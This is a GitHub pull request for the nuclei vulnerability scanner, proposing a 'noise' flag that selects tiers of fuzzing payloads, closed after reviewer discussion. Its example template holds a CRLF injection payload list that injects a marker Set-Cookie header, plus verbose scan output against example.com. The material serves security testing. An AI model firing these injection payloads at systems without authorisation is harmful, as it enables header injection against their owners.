Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added noise parameter for http payload conditional fuzzing support #3125

Closed
wants to merge 1 commit into from
Closed

Added noise parameter for http payload conditional fuzzing support #3125

wants to merge 1 commit into from

Conversation

Ice3man543
Copy link
Member

Proposed changes

Closes #3005

id: crlf-injection

info:
  name: CRLF Injection
  author: pdteam
  severity: low
  tags: crlf,dast

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    payloads:
      escape:
        low: 
          - "%00"
          - "%0a"
          - "%0a%20"
          - "%0d"
        medium:
          - "%0d%09"
          - "%0d%0a"
          - "%0d%0a%09"
          - "%0d%0a%20"
          - "%0d%20"
          - "%20"
          - "%20%0a"
          - "%20%0d"
          - "%20%0d%0a"
          - "%23%0a"
          - "%23%0a%20"
          - "%23%0d"
          - "%23%0d%0a"
          - "%23%oa"
          - "%25%30"
        high:
          - "%25%30%61"
          - "%2e%2e%2f%0d%0a"
          - "%2f%2e%2e%0d%0a"
          - "%2f..%0d%0a"
          - "%3f"
          - "%3f%0a"
          - "%3f%0d"
          - "%3f%0d%0a"
          - "%e5%98%8a%e5%98%8d"
          - "%e5%98%8a%e5%98%8d%0a"
          - "%e5%98%8a%e5%98%8d%0d"
          - "%e5%98%8a%e5%98%8d%0d%0a"
          - "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d"
          - "%u0000"
          - "%u000a"
          - "%u000d"
          - "\r"
          - "\r%20"
          - "\r\n"
          - "\r\n%20"
          - "\r\n\t"
          - "\r\t"

    fuzzing:
      - part: query
        type: postfix
        fuzz:
          - "{{escape}}Set-Cookie:crlfinjection=crlfinjection"

    stop-at-first-match: true
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'

Example run

./nuclei -t template.yaml -u "https://example.com/?test=value" -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.8.4-dev

                projectdiscovery.io

[INF] Using Nuclei Engine 2.8.4-dev (development)
[INF] Using Nuclei Templates 9.3.3 (latest)
[INF] Templates added in last update: 238
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%2500Set-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250aSet-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250a%2520Set-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250dSet-Cookie%3Acrlfinjection%3Dcrlfinjection
[INF] No results found. Better luck next time!
 
 ./nuclei -t template.yaml -u "https://example.com/?test=value" -v -noise medium

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.8.4-dev

                projectdiscovery.io

[INF] Using Nuclei Engine 2.8.4-dev (development)
[INF] Using Nuclei Templates 9.3.3 (latest)
[INF] Templates added in last update: 238
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%2500Set-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250aSet-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250a%2520Set-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250dSet-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250d%2509Set-Cookie%3Acrlfinjection%3Dcrlfinjection
[VER] [crlf-injection] Sent HTTP request to https://example.com/?test=value%250d%250aSet-Cookie%3Acrlfinjection%3Dcrlfinjection
...

Checklist

  • Pull request is created against the dev branch
  • All checks passed (lint, unit/integration/regression tests etc.) with my changes
  • I have added tests that prove my fix is effective or that my feature works
  • I have added necessary documentation (if appropriate)

@Ice3man543 Ice3man543 self-assigned this Jan 2, 2023
@Ice3man543 Ice3man543 added the Status: Review Needed The issue has a PR attached to it which needs to be reviewed label Jan 2, 2023
@Ice3man543 Ice3man543 linked an issue Jan 2, 2023 that may be closed by this pull request
Add noise level to configure fuzzing payload count at runtime based on user preference #3005
Closed
@Mzack9999
Copy link
Member

As the change is quite structural (YAML syntax), what do you think about creating different templates with different noise tags and reusing all common parts with #1767?

@Ice3man543
Copy link
Member Author

@Mzack9999 that would make it quite complicated and probably unusable. This was the cleanest solution i could think of while having all types of payload sets in a single file.

Mzack9999
Mzack9999 approved these changes Jan 4, 2023
View reviewed changes
Copy link
Member

@Mzack9999 Mzack9999 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

lgtm implementation - I'd recommend double checking with @ehsandeep the yaml syntax proposed change

tarunKoyalwar
tarunKoyalwar reviewed Jan 5, 2023
View reviewed changes
v2/cmd/nuclei/main.go
@@ -195,6 +195,7 @@ on extensive configurability, massive extensibility and ease of use.`)
flagSet.BoolVarP(&options.ForceAttemptHTTP2, "force-http2", "fh2", false, "force http2 connection on requests"),
flagSet.BoolVarP(&options.EnvironmentVariables, "env-vars", "ev", false, "enable environment variables to be used in template"),
flagSet.StringVarP(&options.ClientCertFile, "client-cert", "cc", "", "client certificate file (PEM-encoded) used for authenticating against scanned hosts"),
flagSet.StringVarP(&options.Noise, "noise", "ne", "low", "noise level for http fuzzing (accepted: low,medium,high)"),
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@Ice3man543 , what do you think of shortflag nl ?

tarunKoyalwar
tarunKoyalwar approved these changes Jan 5, 2023
View reviewed changes
Copy link
Member

@tarunKoyalwar tarunKoyalwar left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

lgtm!

@ehsandeep
Copy link
Member

ehsandeep commented Jan 31, 2023
edited
Loading

@Ice3man543 using in template payloads with different levels may not work well, as either, we need to dedupe the payload in each section to ensure we are not missing obvious/common payloads from one level by using another one, and then deduping payloads may not go well as the payload lines increases; instead, this can be controlled efficiently directly from CLI by mapping payload request counter with noise levels, for example, low level will execute 30% of payloads of each template and so on, also let's tackle this later, closing the PR for now as this needs to be reworked in future with a different strategy.

@ehsandeep ehsandeep closed this Jan 31, 2023
@ehsandeep ehsandeep removed the Status: Review Needed The issue has a PR attached to it which needs to be reviewed label Jan 31, 2023
@ehsandeep ehsandeep deleted the 3005-noise-fuzz branch January 31, 2023 21:43
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@Mzack9999 Mzack9999 Mzack9999 approved these changes

@tarunKoyalwar tarunKoyalwar tarunKoyalwar approved these changes

@ehsandeep ehsandeep Awaiting requested review from ehsandeep

Assignees

@Ice3man543 Ice3man543

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Add noise level to configure fuzzing payload count at runtime based on user preference
4 participants
@Ice3man543 @Mzack9999 @ehsandeep @tarunKoyalwar